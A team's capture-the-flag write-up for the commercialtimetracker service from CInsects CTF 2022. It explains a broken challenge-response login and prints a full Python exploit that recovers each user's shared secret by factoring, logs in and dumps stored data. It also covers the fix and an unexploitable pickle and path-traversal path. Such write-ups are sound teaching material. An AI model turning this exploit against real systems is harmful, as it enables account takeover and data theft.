Saarsec

Schwenk and pwn

CInsects CTF 2022 - commercialtimetracker

commercialtimetracker is a Python service for tracking work times, based on gevent. It contained a custom, hash-based authentication method that was flawed, allowing attackers to recover the authentication secret.

This service was part of the CInsects CTF 2022. We exploited it pretty early in the CTF: in fact, we were sitting on a working exploit for over an hour before the checkers and flag submission were up. Unfortunately, the service was broken for many teams, so we didn’t get many flags out of this exploit.

Service Overview

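The service employed a custom, line-based protocol. The server opens a connection by sending CTT EHLO, the client responds with CTT EHLO, and from then on the connection accepts commands. The commands our exploit relies on are LIST (list all user identifiers), LOGIN <identifier> (request a challenge), RESPONSES <i> <hash1> <j> <hash2> (answer the challenge), TIMES (retrieve the stored times), and BYE (end the session).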

Data was stored in pickle’d files, named by the user’s identifier, but serialization was not exploitable (details at the end).

The interesting part was the login implementation, which was a challenge-response scheme with proof-of-work included: On registration, server and client share a large number, the shared secret. On login, the server generates two numbers. The client then searches for two other numbers that make hash(<secret>-<challenge>-<n>) start with 0000 (hex). The client responds with the two numbers and the full hashes for verification.
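The proof-of-work half of this scheme can be sketched in a few lines. This is a minimal illustration, not the service's code: the function name solve_pow and the example numbers are made up, while the hash input format and the use of BLAKE2b follow the implementation shown in this post.

```python
import hashlib
from itertools import count


def solve_pow(shared_secret: int, challenge: int):
    """Search for the smallest n whose hash starts with four hex zeros.

    Returns the counter n together with the full hex digest, which is
    what the client sends back for one of the two challenges.
    """
    for n in count():
        message = f'{shared_secret}-{challenge}-{n}'.encode()
        digest = hashlib.blake2b(message).hexdigest()
        if digest.startswith('0000'):
            return n, digest


# Hypothetical values, only for demonstration.
n, digest = solve_pow(shared_secret=123456789, challenge=987654321)
print(n, digest[:16])
```

Four leading hex zeros correspond to 16 zero bits, so the search needs about 65,536 hash evaluations on average per challenge. Without the secret, a valid hash cannot be computed at all, which is why recovering the secret is the interesting part.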

The exact implementation was:

import hashlib
import sys
from collections import namedtuple
from random import SystemRandom

from sympy import nextprime as abs

ClientAccountInfo = namedtuple('ClientAccountInfo', ('client_identifier', 'shared_secret', 'nickname'))
ChallengeChallenge = namedtuple('ChallengeChallenge', ('challenge1', 'challenge2'))
ChallengeResponse = namedtuple('ChallengeResponse', ('i', 'response1', 'j', 'response2'))


class BaseConsoleFoobarCommercialInnovativeProcess:
    def _write_line(self, message):
        if hasattr(self, 'sock'):
            self.sock.sendall(message.encode() + b'\n')
        else:
            sys.stdout.write(message + '\n')
            sys.stdout.flush()

    @staticmethod
    def _generate_challenge(shared_secret: int) -> ChallengeChallenge:
        """
        Generate a super secret secret for this top secure military-grade
        challenge-response-challenge-response authentication.
        This uses two challenges and responses (that are both transferred simultaneously
        for performance reasons). Obviously, when doing two challenge-response pairs,
        the system is even more unbreakable than with only a single challenge.
        We may extend this with a third challenge-response in a future version
        to make it even more unbreakable.
        """
        rand = abs(SystemRandom().randint(10800, 3542000002))
        rand2 = abs(SystemRandom().randint(10800, 3542000002))
        # multiply with the shared secret to have user-specific challenges. This is really imporant for security!!!
        #  And of course it absolutely makes sense.
        challenge1 = shared_secret * rand
        challenge2 = abs(challenge1 + 42 * rand2)
        # add some random noise!
        challenge1 += challenge2
        return ChallengeChallenge(challenge1, challenge2)

    @staticmethod
    def _verify_response(account_info: ClientAccountInfo, challenge: ChallengeChallenge,
                         response: ChallengeResponse) -> bool:
        if not response.response1[:4] == response.response2[:4] == 4 * '0':
            return False
        hash1 = hashlib.blake2b(
            f'{account_info.shared_secret}-{challenge.challenge1}-{response.i}'.encode()).hexdigest()
        hash2 = hashlib.blake2b(
            f'{account_info.shared_secret}-{challenge.challenge2}-{response.j}'.encode()).hexdigest()
        return hash1 == response.response1 and hash2 == response.response2

Vulnerability

The challenges are generated from the secret $s$ and two random primes $r_1$ and $r_2$. Note that abs is not the builtin here: it is sympy.nextprime, imported under that name. Each prime had at most 32 bits, the secret was a bit larger, and there is no modular arithmetic, since Python’s integers are of arbitrary size. Then the challenges $c_1$ and $c_2$ were generated:

$$c_0 = s \cdot r_1, \qquad c_2 = \mathrm{nextprime}(c_0 + 42 \cdot r_2), \qquad c_1 = c_0 + c_2$$

Only $c_1$ and $c_2$ were sent to the client. But from these challenges, we can recover the shared secret $s$. After receiving one challenge, we recompute $c_0 = c_1 - c_2$. We factorize $c_0$, which is simple because it has fewer than 100 bits. One of these factors is $r_1$, the remaining ones come from $s$. We could now guess which factor was $r_1$, or request a second challenge, which gives us $c_0' = s \cdot r_1'$: the factors of $s$ also divide the second $c_0'$, only $r_1$ does not divide $c_0'$ (unless the same prime happens to be drawn twice). Having recovered $s$ as the product of the remaining factors, we can restart the authentication and create a valid response.
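To make the recovery concrete, here is a toy run of the same steps with deliberately small numbers. Everything in it is an assumption for illustration: the secret, the fixed primes, and the helper names (make_challenge, trial_factor, recover_secret) are made up, and plain trial division stands in for both sympy.nextprime and a real factorization routine.

```python
from math import gcd, prod


def is_prime(n: int) -> bool:
    """Trial division; fine for the small toy numbers used here."""
    if n < 2:
        return False
    d = 2
    while d * d <= n:
        if n % d == 0:
            return False
        d += 1
    return True


def next_prime(n: int) -> int:
    """Smallest prime strictly greater than n (stand-in for sympy.nextprime)."""
    n += 1
    while not is_prime(n):
        n += 1
    return n


def make_challenge(secret: int, r1: int, r2: int):
    """Mirror the server's arithmetic, with fixed primes instead of random ones."""
    c0 = secret * r1
    challenge2 = next_prime(c0 + 42 * r2)
    challenge1 = c0 + challenge2
    return challenge1, challenge2


def trial_factor(n: int):
    """Return the prime factors of n (with multiplicity) by trial division."""
    factors = []
    d = 2
    while d * d <= n:
        while n % d == 0:
            factors.append(d)
            n //= d
        d += 1
    if n > 1:
        factors.append(n)
    return factors


def recover_secret(first, second) -> int:
    """Factor c0 from the first challenge, keep the factors dividing the second c0."""
    c0_first = first[0] - first[1]
    c0_second = second[0] - second[1]
    survivors = [f for f in trial_factor(c0_first) if c0_second % f == 0]
    return prod(survivors)


SECRET = 71 * 839 * 1471  # toy secret, far smaller than a real one
first = make_challenge(SECRET, r1=10007, r2=10009)
second = make_challenge(SECRET, r1=10037, r2=10039)
recovered = recover_secret(first, second)
print(recovered == SECRET)
```

With two challenges in hand, gcd(c0, c0') yields the same value whenever the two random primes differ, which makes a handy cross-check on the factor filtering.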

Exploit

Our exploit literally follows the vulnerability description. We first get a list of all user identifiers with the LIST command. For each user, we request two challenges. We factorize the first one, and use the second one to test the factors. We used the first StackOverflow result for a factorization algorithm, which was not perfect, but good enough. Because we didn’t have checker traffic on our service when writing the exploit, we did not know the size of the gameserver’s secrets, so we prepared a second factorization function based on yafu. After having cracked a secret, we log in and retrieve all times, which contain the flags.

import hashlib
import json
import multiprocessing
import os
import re
import subprocess
import sys
import time
from typing import List

import redis
import requests

os.environ['PWNLIB_NOTERM'] = '1'

from pwn import *

from math import gcd

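def factorization(n):
    """Pollard's rho with Brent-style cycle detection.

    Not perfect: a returned factor may itself be composite, and a prime n
    is only returned once the sequence has cycled. Good enough for us.
    """
    factors = []
    def get_factor(n):
        x_fixed = 2
        cycle_size = 2
        x = 2
        factor = 1
        while factor == 1:
            for count in range(cycle_size):
                if factor > 1: break
                x = (x * x + 1) % n
                factor = gcd(x - x_fixed, n)
            cycle_size *= 2
            x_fixed = x
        return factor
    # split off one factor at a time until nothing is left
    while n > 1:
        factor = get_factor(n)
        factors.append(factor)
        n //= factor
    return factors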


def factor_yafu(n: int) -> List[int]:
    output = subprocess.check_output(['./yafu', f'factor({n})']).decode()
    if '***factors found***' in output:
        factors = re.findall(r'P\d+ = (\d+)', output)
        return [int(f) for f in factors]
    return []


REDIS_HOST = "127.0.0.1"

def redisget(key, content_type=set):
    rconn = redis.Redis(host=REDIS_HOST)
    raw_data = rconn.get(key)
    if raw_data is None:
        return content_type()
    try:
        data = json.loads(raw_data)
        if not isinstance(data, content_type):
            return content_type(data)
        return data
    except (ValueError, TypeError):  # malformed JSON or unexpected shape
        return content_type()


def redisset(key, value):
    if isinstance(value, set):
        value = list(value)
    rconn = redis.Redis(host=REDIS_HOST)
    rconn.set(key, json.dumps(value))


# copied from the provided client.py
def generate_response(shared_secret: int, challenge1, challenge2):
    # proof of work for challenge1: first two digest bytes must be zero
    i = 0
    while True:
        hash1 = hashlib.blake2b(f'{shared_secret}-{challenge1}-{i}'.encode()).digest()
        if all(b == 0 for b in hash1[:2]):
            break
        i += 1
    # same search for challenge2
    j = 0
    while True:
        hash2 = hashlib.blake2b(f'{shared_secret}-{challenge2}-{j}'.encode()).digest()
        if all(b == 0 for b in hash2[:2]):
            break
        j += 1
    return [str(i), hash1.hex(), str(j), hash2.hex()]


def exploit(target: str):
    # 1. get a list of user idents
    conn = remote(target, 7777, timeout=7)
    print(conn.recvline())
    conn.sendline(b'CTT EHLO')
    print(conn.recvline())
    conn.sendline(b'LIST')
    idents = conn.recvline().decode().strip().split(' ')[1:]
    print(idents)
    conn.sendline(b'BYE')
    conn.close()

    # redis check so that we don't attack users twice
    seen_idents = redisget(f'commercialtt_idents:{target}')
    print(seen_idents)
    print(set(idents) - seen_idents)

    for ident in idents:
        if ident in seen_idents:
            continue
        # 2. retrieve challenges
        print('NEW IDENT', ident, '...')
        conn = remote(target, 7777)
        conn.recvline()
        conn.sendline(b'CTT EHLO')
        conn.recvline()
        conn.sendline(b'LOGIN '+ident.encode())
        values = conn.recvline()
        conn.sendline(b'RESPONSES 0 0 0 0')
        conn.recvline()
        _, _, a, b = values.strip().split()
        ab = int(a.decode()) - int(b.decode())  # this is c0
        print('factoring ', ab, '...')
        ts = time.time()
        results = factorization(ab)
        #results = factor_yafu(ab)
        ts = time.time() - ts
        print('FACTORS', results, 'in', ts, 'seconds')

        # 3. retrieve second challenges
        conn.recvline()
        conn.sendline(b'LOGIN ' + ident.encode())
        values = conn.recvline()
        print(values)
        conn.sendline(b'RESPONSES 0 0 0 0')
        print(conn.recvline())
        _, _, a, b = values.strip().split()
        ab = int(a.decode()) - int(b.decode())  # this is c0'
        results2 = [r for r in results if (ab) % r == 0]  # filter the random factor out
        print('FACTORS SURVIVED:', results2)
        secret = 1
        for r in results2:
            secret *= r
        print('SECRET =', secret)  # recovered secret
        conn.sendline(b'BYE')
        conn.close()

        # 4. login with recovered secret (on new connection)
        conn = remote(target, 7777)
        conn.recvline()
        conn.sendline(b'CTT EHLO')
        conn.recvline()
        conn.sendline(b'LOGIN ' + ident.encode())
        values = conn.recvline()
        print(values)
        _, _, a, b = values.strip().split()
        responses = generate_response(secret, int(a.decode()), int(b.decode()))
        print('RESPONSES ' + ' '.join(str(r) for r in responses))
        conn.sendline(('RESPONSES ' + ' '.join(str(r) for r in responses)).encode())
        print(conn.recvline())
        # 5. retrieve all stored times
        conn.sendline(b'TIMES')
        conn.sendline(b'BYE')
        print(conn.recvall(timeout=3))

        seen_idents.add(ident)
        redisset(f'commercialtt_idents:{target}', seen_idents)  # don't exploit this user next time


if __name__ == '__main__':
    exploit('127.0.0.1' if len(sys.argv) < 2 else sys.argv[1])

Fixes

The fix was simple: the secret is not needed for challenge generation, since the scheme works independently of the chosen challenge numbers. We can replace it with some constant. In our case we patched line 36 of the listing above (challenge1 = shared_secret * rand) to challenge1 = 0x1337 * rand.
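For illustration, a patched challenge generator could look roughly like the sketch below. It is self-contained, so it swaps sympy.nextprime for a small Miller-Rabin helper; the names is_probable_prime, next_prime, PUBLIC_CONSTANT and generate_challenge_patched are stand-ins, and the service itself only needed the one-line change.

```python
from random import SystemRandom

SMALL_PRIMES = (2, 3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37)


def is_probable_prime(n: int) -> bool:
    """Miller-Rabin with fixed bases, exact for the number sizes used here."""
    if n < 2:
        return False
    for p in SMALL_PRIMES:
        if n % p == 0:
            return n == p
    # write n - 1 as d * 2**s with d odd
    d, s = n - 1, 0
    while d % 2 == 0:
        d //= 2
        s += 1
    for a in SMALL_PRIMES:
        x = pow(a, d, n)
        if x in (1, n - 1):
            continue
        for _ in range(s - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False  # a is a witness that n is composite
    return True


def next_prime(n: int) -> int:
    """Smallest prime strictly greater than n (stand-in for sympy.nextprime)."""
    n += 1
    while not is_probable_prime(n):
        n += 1
    return n


PUBLIC_CONSTANT = 0x1337  # replaces the shared secret in the challenge


def generate_challenge_patched():
    rng = SystemRandom()
    rand = next_prime(rng.randint(10800, 3542000002))
    rand2 = next_prime(rng.randint(10800, 3542000002))
    challenge1 = PUBLIC_CONSTANT * rand  # no secret involved any more
    challenge2 = next_prime(challenge1 + 42 * rand2)
    challenge1 += challenge2
    return challenge1, challenge2


c1, c2 = generate_challenge_patched()
print((c1 - c2) % PUBLIC_CONSTANT == 0)
```

An attacker can still compute c1 - c2 and factor it, but the result now only contains the public constant and a random prime. Verification is unaffected, because the secret still enters the hash that the client has to produce.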

An Unexploitable Vulnerability?

Data was stored in pickle’d files, named by the user’s identifier. The read and write logic was almost vulnerable: First, the code to unpickle was in theory vulnerable to a deserialization attack:

pickle.secure_dump = pickle.dump
pickle.secure_load = pickle.load
pickle.UnpicklingMayBeInsecure = pickle.UnpicklingError

# ...

try:
    return pickle.secure_load(file)
except pickle.UnpicklingMayBeInsecure:
    return None

The code was pretending to use secure versions of pickle, but the redefinitions at the top of the file redefined them to the insecure variants. To get a deserialization attack working, one would need attacker-provided input. We could store files on disk using another service (securestorage), but would then need a path traversal attack. The path of the input file was checked like this (key is attacker-provided):

path = (DATABASE / key).resolve().absolute()
assert '/' not in path.relative_to(DATABASE).as_posix()
assert '.' not in path.as_posix()

If one tried a path traversal attack against this code (key='../../xyz'), resolve() would rebuild the path without ../, so the '.' not in check is trivially bypassed. However, the relative_to method raises an exception if the new path is not relative to the database path, making the vulnerability unexploitable.
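The behaviour of this check is easy to reproduce in isolation. The sketch below wraps the three lines from the service in a helper and feeds it a few keys; the database location, the function names checked_path and outcome, and the sample keys are assumptions for the demonstration, and a POSIX system is assumed.

```python
from pathlib import Path

# Hypothetical database location; it does not need to exist.
DATABASE = Path('/srv/ctt/_data').resolve()


def checked_path(key: str) -> Path:
    """Apply the same three-line check as the service."""
    path = (DATABASE / key).resolve().absolute()
    assert '/' not in path.relative_to(DATABASE).as_posix()
    assert '.' not in path.as_posix()
    return path


def outcome(key: str) -> str:
    """Report which part of the check, if any, stops the key."""
    try:
        checked_path(key)
        return 'accepted'
    except ValueError:
        # relative_to() refuses paths outside DATABASE
        return 'rejected by relative_to'
    except AssertionError:
        return 'rejected by assert'


for key in ('alice', '../../xyz', '/etc/passwd', 'sub/dir', 'notes.txt'):
    print(f'{key!r}: {outcome(key)}')
```

Both the traversal and the absolute path are stopped by relative_to before either assert gets a chance to run, while nested paths and names containing a dot fall to the asserts.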

We’re not sure whether this was an intended but broken vulnerability, or just trolling.

Repairing the service

Unfortunately, the service was broken in multiple ways on the vulnbox. While the organizers claimed to have deployed fixes at some point, the service was still not working. Luckily, it was installed on the one vulnbox (out of three) that we had access to, so we patched it ourselves. Three things needed attention:

  1. The service was not initialized. While an init.sh script was available, it was never called.
  2. The service was lacking dependencies: sympy was not installed. Unfortunately, the vulnbox had no internet access, so we couldn’t simply use pip to install sympy. We solved this by downloading Debian’s packaged sympy and its dependencies, copying them to the vulnbox over SSH, and installing them with dpkg.
  3. The device that contained the database folder was behaving strangely: whenever a new file was to be created, it reported no space left, although the device was almost empty. Editing existing files was still possible, even if these files got larger (assuming one would install a text editor). We fixed this by moving the database folder to a different partition.

We also published these patches on IRC in the hope of getting some exploitable targets up, but at this point, many teams were already inactive. With only a few targets to exploit, our attack did not yield as many flags as we had hoped.

This is the patch script we posted:

# run locally, replace "vulnbox" with your SSH config name
wget 'http://ftp.de.debian.org/debian/pool/main/m/mpmath/python3-mpmath_1.2.1-1_all.deb'
wget 'http://ftp.de.debian.org/debian/pool/main/s/sympy/python3-sympy_1.7.1-3_all.deb'
scp python3-mpmath_1.2.1-1_all.deb python3-sympy_1.7.1-3_all.deb vulnbox:~/
ssh vulnbox 'dpkg -i ~/*.deb && /media/static/commercialtimetracker/init.sh && systemctl restart run@commercialtimetracker'
# run on vulnbox as root
cp /media/static/commercialtimetracker/server.py ~/server.py
sed "s|DATABASE = Path('_data').absolute()|DATABASE = Path('/home/commercialtimetracker/_data').absolute()|" ~/server.py > /media/static/commercialtimetracker/server.py
mkdir /home/commercialtimetracker/_data
chown commercialtimetracker /home/commercialtimetracker/_data
systemctl restart run@commercialtimetracker

Summary

All in all, this was a small but interesting service with a beginner-friendly vulnerability, for which we had an exploit rather quickly.